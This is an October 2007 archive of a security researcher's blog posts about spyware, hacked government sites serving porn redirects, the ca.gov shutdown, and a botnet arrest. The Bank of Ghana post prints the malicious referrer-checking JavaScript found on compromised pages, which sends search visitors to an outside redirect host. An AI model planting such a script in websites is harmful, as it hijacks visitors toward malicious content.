Month: October 2007

Odd little post by a Michigan ABC affiliate:

…We understand that inappropriate advertisements are appearing on a small number of user computers on Web sites across the Internet, including abc12.com.

The source seems to be Spyware. Some web users may have inadvertently installed Spyware (commonly known as Zango or other third party Spyware) without knowing it by viewing a video from a disreputable Web site, playing a game or downloading an application such as icons, smiley faces or other software.

When users with infected computers search Web sites, inappropriate and unapproved ads may appear within normal advertising space without anyone’s control and no revenue associated.

We want to reassure those who may have seen inappropriate ads on abc12.com that these ads are not coming from us.

Link here. [Update: They have now changed the text.]

Alex Eckelberry

Here’s a nice, self-serving press release for me to post:

Spending on security technology, training, assessments, and certification now accounts for one-fifth of total technology budgets, according to research from the Computing Technology Industry Association (CompTIA).

A survey of 1,070 organizations found that on average, they spent 20 percent of their total technology budget in 2006 on security-related expenses. Thats up from 15 percent in 2005, and 12 percent in 2004.

Organizations also expect to increase spending across all areas related to security in the next 12 months. Nearly one-half of respondents to the CompTIA survey said they intend to increase spending on security-related technologies; and one-third of respondents expect to increase spending on security training. Among those expecting to increase spending, the average increase is in the range of 19-23 percent, regardless of area.

The survey also showed that for each dollar spent on security, about 42 cents is allocated for technology product purchases; 17 cents for security-related processes; 15 cents for training; 12 cents for assessments; 9 cents for certification; and the balance on other items.

Antivirus software, firewalls and proxy servers continue to be the top technologies for security enforcement, utilized by nearly all organizations. The past two years have seen a significant increase in the use of multiple security enforcement technologies to combat attacks, including firewalls, proxy servers, intrusion detection systems, physical access control, multi-factor authentication, and other technologies.

Release here.

Alex Eckelberry

Nope, it’s not podcast. This is good old-fashioned radio.

Archive.org has a collection of recordings of the original CounterSpy show which ran during the 40s and 50s. Link here.

Alex Eckelberry

Pre-checked, installing Ask Toolbar and Search Assistant.

(I’m so biased, it’s not even worth continuing with any commentary.)

Alex Eckelberry

Everyone wants to be Microsoft. There’s people using Google keywords of “Microsoft Antispyware”. There’s fake Microsoft security sites being registered. And now an apparent porn search site, maxing-search(dot)com has a fake Microsoft Antispyware Center.

Swatkat has more here.

Alex Eckelberry
(Thanks Suzi)

Ed Dickson, a fellow blogger, noted today that the now-infamous Marin County Transportation Authority website was still serving porn.

Nah, I knew that stuff might be showing up in the Google cache, but as far as I knew as of Friday, it was clean. So I figured I’d do a quick check for myself.

I was a bit surprised to find out he was right. The Marin County website is back to happily serving porn, after all that’s happened.

A simple Google search using the search term “porn sex site:tam.ca.gov” shows the results.

Some pretty rough stuff, I might add…

And attempts to get you to install malware…

I admit, at this point I feel pretty sorry for these folks.

Let’s hope the Governments peeps don’t try and shut down teh internets again.

Alex Eckelberry

Thought I’d share these numbers with you.

Client agent OS usage by CounterSpy Enterprise:

This is a sampling of what operating system CounterSpy Enterprise agents deployed at customer sites report back. In this particular sampling, the bias will be toward small to medium business, and shows a very slow adoption of Vista in business environments.

Now, what our website sees:

These are the operating system versions as reported by the browser to our main website. This would reflect a mix of more general usage — consumers and business.

I’d be curious to know what others are seeing out there as well.

Alex Eckelberry
Update: Panda gives their take here.

The Bank of Ghana is serving porn.

A Yahoo search brings up some startling results (thumbnailed due to highly graphic content):

Narrowing down the search a wee bit:

Ouch, nasty stuff.

These pages redirect to porn (graphic content).

The code looks for referrals from search engines. Example:

http://rainbowdisplays(dot)com/xxxxx/fetish(dot)js

function f(){
var r=document.referrer,t=””,q;
if(r.indexOf(“google.”)!=-1)t=”q”;
if(r.indexOf(“msn.”)!=-1)t=”q”;
if(r.indexOf(“yahoo.”)!=-1)t=”p”;
if(r.indexOf(“altavista.”)!=-1)t=”q”;
if(r.indexOf(“aol.”)!=-1)t=”query”;
if(r.indexOf(“ask.”)!=-1)t=”q”;
if(r.indexOf(“comcast.”)!=-1)t=”q”;
if(r.indexOf(“bellsouth.”)!=-1)t=”string”;
if(r.indexOf(“netscape.”)!=-1)t=”query”;
if(r.indexOf(“mywebsearch.”)!=-1)t=”searchfor”;
if(r.indexOf(“peoplepc.”)!=-1)t=”q”;
if(r.indexOf(“starware.”)!=-1)t=”qry”;
if(r.indexOf(“earthlink.”)!=-1)t=”q”;
if(t.length&&((q=r.indexOf(“?”+t+”=”))!=-1(q=r.indexOf(“&”+t+”=”))!=-1))
window.location=(“http://grandsupport(dot)net/td/in(dot)cgi?13&seoref=”+encodeURIComponent(document.referrer)+ “&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=”+encodeURIComponent(document.URL)+”&default_keyword=fetish”);
}window.onFocus = f()

This loads the site grandsupport(dot)net

Let’s hope they get this cleaned up soon (we have notified them).

Alex Eckelberry
(Thanks to Sunbelt researcher Adam Thomas for this.)

I was rooting for Apple’s iPhone. I even had my kids watch Job’s extraordinary keynote earlier this year.

I was irritated, but somewhat forgiving, of Apple decision only allowing AT&T as a provider. It was arrogant, but it was also typically Apple — and it was worth overlooking in light of such a cool phone. Even the whole price drop fiasco didn’t bother me that much.

And we all know that after a while, a few people figured out a way to unlock the phone so it would actually work on a phone system they actually want to use (Apple’s stock price even went up when the first hack was announced).

Well, Apple didn’t seem to notice the message being loudly telegraphed to it. Because, as we all know, Apple, in an even more astounding and ridiculous act of audacity, then turned hacked phones temporarily into a brick. This was an act so stupid, it boggles the mind.

In my opinion, they should have no future, as a phone provider. Because they refuse to even contemplate how the phone business works. They decided to create their own playbook, and they are now going to get hit in the head with it.

What’s the playbook for phones? You come out with versions that supports both TDMA/CDMA and GSM infrastructures. You partner with a number of phone companies, that blow the phone out for cheap in order to get subscribers. You allow your phone (even tacitly) to become unlocked. And if your phone is hot, you sell millions upon millions of them (the RAZR has sold over 100 million phones — and Apple has bragging rights on a million phones sold?).

Customers are a precious commodity.

Competition is fierce in this business, and one only has to look at the new Tilt, BlackBerry 9000 and LG Voyager to see the handwriting on the wall (heck, what about the low-priced Palm Centro?). Even Zune is starting to go DRM-free now (at least partially), so those slick iPods may be less interesting by the minute.

Apple’s future as a phone provider is bleak.

I’m disgusted by Apple’s jackanape arrogance, and its even more regrettable since they have offerings which I believe are truly valuable and need more adoption. They are doing the same stupid things that nearly killed them as a company back in the late 80s and early 90s with closed systems. As just one example, iTunes is a potential goldmind, and they could focus on getting as many iPhones out there to build a larger market for iTunes (as well as getting other hardware devices to support iTunes), to build content-based recurring revenue streams.

I hope Jobs gets the message: Your customers are everything that ever matters in business.

If you treat your customers like idiots, a terrible thing happens: Nothing.

In other words, you get no customers.

Alex Eckelberry

One example:

www.star.bnl.gov/STAR/html/tmp/pub/effplots/virgin(dot)html

And there’s plenty more.

Now, the national security of our country is not at risk (as far as we know). These are just porn redirects coming off of places in Brookhaven’s site.

Alex Eckelberry
(Brookhaven has been contacted and they are taking these down right away.)

Despite all the hullabaloo, the now-infamous Marin County TAM website, responsible for a federal shutdown of ca.gov sites, is still not completely clean. While it’s not redirecting to malware or porn anymore, it still has some dirt underneath the fingernails.

You can play your own version of Find Waldo with this: Go to the site, view source and find the hacked links… (need a hint?).

You can also see that their junk is still showing up on Google.

(These links are both dead, but still show up in Google searches).

Ok, so that was fun. But let’s do a little more hunting, shall we?

Using the simple search term sex porn site:ca.gov, we now find that madera.courts.ca.gov has experienced some pwnage of its own:

Going to these pages, we see this:

We find the intersection of jurisprudence and… Viagra!

Just another day in the life of a security company. Something interesting, every day.

Alex Eckelberry
(Thanks to Sunbelt researcher Suzi Turner for the help.)

Yesterday, we reported on a federal shutdown of “ca.gov” sites to fix a hack.

Well, we have a little more information on this.

It was the Marin County government website that started all of this — something we reported back in September 12th.

They were warned. But they didn’t believe the warnings:

Marin officials first learned of the hacker’s use of the site when private online security companies warned that the Web page had been infiltrated.

Steinhauser said she and other staffers at first were suspicious of the online warnings from security firms because they were worried they could be a form of “phishing” used by hackers seeking to hijack Web sites.

Well, here’s some email that Suzi Turner (who works for Sunbelt as a security consultant) had sent them, on September 12th (she also left them a voice mail).

I had also sent them an email on September 12th:

And I’m pretty darned sure we’re not the only ones who alerted them.

There’s also an SC Mag story this morning, with speculation that this was an iFrame hack. No, actually, it was a DNS hack.

So, was shutting down the entire system overkill? Of course. It was complete overkill. But on the other hand, it’s a wake up call: Keep your site clean. And for pete’s sake, please heed the warnings of security researchers when they send you email.

Alex Eckelberry
(thanks to Ferg for his help, and also the numerous unnamed security researchers who helped on this as well.)

OK, now he’s going to be impossible to have around.

In his latest book, Blink, Malcolm Gladwell tries to discover how great thinkers and decision makers get to be so great. There is no one answer, he concludes. Great decisions can be made in the blink of an eye, but only after years and sometimes decades of building expertise.

Redmond magazine set out on a similar journey, to find out how the visionaries that drive today’s third-party innovations came to be so visionary. We interviewed a dozen serial entrepreneurs, CTOs and company founders to find out where their ideas come from, and how they turn them into the products that you all know and love.

Article here.

All joking aside, Greg is a genuine guru and we’re proud to see him recognized for his talents.

Alex Eckelberry

While I was at the VB conference in Vienna a couple of weeks ago, I would occasionally disappear for long periods of time. While most, I’m sure, assumed that I was spending time at the nearby Birdland jazz club (well, I did spend some time there), I was working on a strategic technology partnership with Vienna-based H&S Software. H&S is a technology leader in the area of data retention and archiving.

Today, we announced that partnership officially. The companies will work together on a strategic basis in the areas of email archiving and data retention.

So, I got to kill more than a few birds with one stone: Attend a great conference, do some important business, see some of the sights of Austria and hang out at the Birdland jazz club. All in all, a good trip.

You’ll see more on our plans for email archiving in the coming weeks. It’s enough to say that I’m very excited by this project 😉

Alex Eckelberry

Good news. Maybe all of our constant kvetching is paying off (here, here, etc.)?

SACRAMENTO — A hacker who directed people from a county website to pornography triggered a federal shutdown of state government Internet and e-mail service late Tuesday afternoon, according to a spokesman for Gov. Arnold Schwarzenegger.

The state system, which uses the domain name “ca.gov,” was never hacked and all of its websites and e-mail should be functioning within a few hours, spokesman Aaron McLear said.

He said the federal government moved to suspend the state’s Internet and e-mail service after someone hacked into a county website that contained the domain name ca.gov and redirected people to a pornography site. McLear said he did not know which county website was hacked.

Link here (via Ferg).

Alex Eckelberry

I would love to see a copy of that hard drive…

David Farr was once employed as a respiratory therapist at St. Francis Hospital in Indianapolis, Ind. He started there in October 2000 and was the only male respiratory therapist.

All of the seven respiratory therapists share a small office divided into individual cubicles with one computer in the center of the room. Each therapist is assigned a password, though it’s unclear whether logs are kept of each user’s individual activities.

In July 2005, Farr’s supervisor informed him he was suspended from work because pornographic entries were found in his “Favorites” file, apparently a reference to Web sites bookmarked. Farr denied being responsible and said he was rebuffed when he asked for details about the allegations.

Farr was fired in August 2005. An e-mail message from the hospital’s lawyer at the time claims to “have evidence that provides us with reasonable belief that he was accessing pornographic Web sites on his work computer.”

After losing his job, Farr went through the formal grievance process listed in the hospital handbook and met with no success. He filed a lawsuit after the grievance committee upheld his termination in December 2005.

What makes this case relevant to Police Blotter is that Farr claims that “St. Francis failed to install and update effective antivirus protection on its computers” and that any pornographic bookmarks were inserted by malware. He also claims that antivirus software was required by Health Insurance Portability and Accountability Act.

Farr even retained a computer forensics specialist who concluded: “No one had intentionally loaded the list of Web sites on the computer. Rather, the list was placed on the respiratory therapists’ computer by a common and well-known Internet virus that promotes fee-generating pornographic sites.”

That is plausible. One of the malware programs known to inject porn bookmarks is CoolWebSearch, also called CWS or CoolWWWSearch, and it’s been around since 2003. Some reports have estimated that 5 million sites are infected with it and that more than 60 strains of it exist.

More here.

Alex Eckelberry
(Thanks Francesco)

Last week, we received a sample of personalized spam. The name of the recipient has been redacted — however, it is an accurate spelling of that person’s name.

It goes without saying that the recipient of the spam has no idea who “Tony” is.

So how did this happen? While the first thought might be spammers scraping names from Facebook or LinkedIn, this may very well have occurred by by scraping publicly-available alumni lists. There are a lot of open alumni lists out there, as this Google search shows. And, of course, Augstana college is one of those sites with an open alumni list.

We’ve seen more and more personalized spam attacks over the last several months, and it is a troubling trend. For obvious reasons, a finely targeted spam has a higher chance of being read and acted upon. And that’s one more reason for the urgent need for broad user education and ongoing improvements in security products. And when I say user education — I mean blast it out on mass media through Ad Council methods or what have you.

Alex Eckelberry

Andreas Marx gave a presentation at the Virus Bulletin conference in Vienna, and I’m posting it here for reference.

Paper here.

Presentation (PPT and PDF)*.

From Andreas:

During the Virus Bulletin 2007 Conference I gave a presentation on the topic “The WildList is dead, long live the WildList!”.

It actually confirms that some AV product tests are very problematic, especially, if they are only based on the WildList as reference. I’ve created some interesting statistics to show that the WildList cannot be used anymore (in it’s current state) to show how good or worse products are…

The feedback from the industry was quite interesting… for example, Panda has blogged that they strongly agree on my comments while Sophos disagrees that the WildList is not useful for testing purposes anymore:

Back from Virus Bulletin 2007 (Panda Research Blog)

Is the Wildlist still relevant? (Sophos Blog). I also saw a comment from an other AV tester here. And Authentium’s Eric Kumar has a blog up as well on the subject.

Alas, Andreas caught me on camera swigging some substance at the Virus Bulletin dinner. You can see one of the frightful pictures here.

Alex Eckelberry
* (Copyright is held by Virus Bulletin Ltd, but is made available on this site for personal use free of charge by permission of Virus Bulletin.)

I’m a little late on this one but wanted to get something up.

Yesterday, a botmaster was busted. But this one is close to home: He was allegedly behind the DDoS attack on CastleCops earlier this year.

(Photograph taken from a Yahoo Member Directory, which appears to match the description in the DOJ press release below.)

United States Attorney McGregor W. Scott announced today the arrest of GREG KING, 21, of Fairfield, California, and the unsealing of an Indictment returned on September 27, 2007, charging KING with four counts of electronic transmission of codes to cause damage to protected computers.

This case is the product of an extensive investigation by the Federal Bureau of Investigation.

According to Assistant United States Attorney Matthew D. Segal, a prosecutor with the Computer Hacking and Intellectual Property section of the U.S. Attorney’s Office who is handling the case, the Indictment alleges that KING used a “botnet” to attack computer servers. A botnet is a network of infected computers that, unbeknownst to their owners, are compromised by a hacker and programmed to respond to a hacker’s commands. The infected computers are referred to as “bots,” “zombies,” or “drones.” According to documents filed with the court, KING allegedly controlled over seven thousand such “bots” and used them to conduct multiple distributed denial of service attacks against websites of two businesses. In a distributed denial of service attack, a hacker directs a large number of infected computers (“bots”) to flood a victim computer with information and thereby disable the target computer. On the Internet, KING was also known as “Silenz, Silenz420, sZ, GregK, and Gregk707.”

Press release here, indictiment here.

Alex Eckelberry
(Hat tip to Dre)

This man is clearly in need of a clue-by-four:

European Union interior ministers debated Monday proposals to sanction or shut down Internet sites spreading “terrorist propaganda” and bomb-making instructions.

EU Justice Commissioner Franco Frattini told reporters that he had urged the ministers, during informal talks in Lisbon, Portugal, “to make punishable activities of misuse of the Internet.”

“My intention of course is not to limit freedom of expression,” he said.

“My intention is … to introduce sanctions against those who disseminate terrorist propaganda or instruct on websites how to make a bomb. This has nothing to do with freedom of expression.

“If a given website is found instructing people to make a bomb, the only possible result is to disconnect, or to close such a website,” he said.

First, let’s look at a simple Google search, “how to make a bomb”. Over 17 million hits. Ok, so there’s the practical aspect.

But the bigger question is: Where does it start, and where does it stop?

What, are we now going to ban certain “potentially dangerous” books in libraries?

Or do we ultimately go down the path of Thailand, which outright banned YouTube in their country? And let’s not even talk about China.

The Internet is a big fat load of tubes and happiness that shovels out all kinds of useless and useful information. And I know that some people are irresponsible with what information they disseminate.

However, it’s one thing to crack down on terrorist cells that use the net for criminal purposes (which can be done through standard surveillance practices). But it’s another to start coming out with useless restrictions which ultimately will lead to a censored society.

Alex Eckelberry
(Thanks, Richard)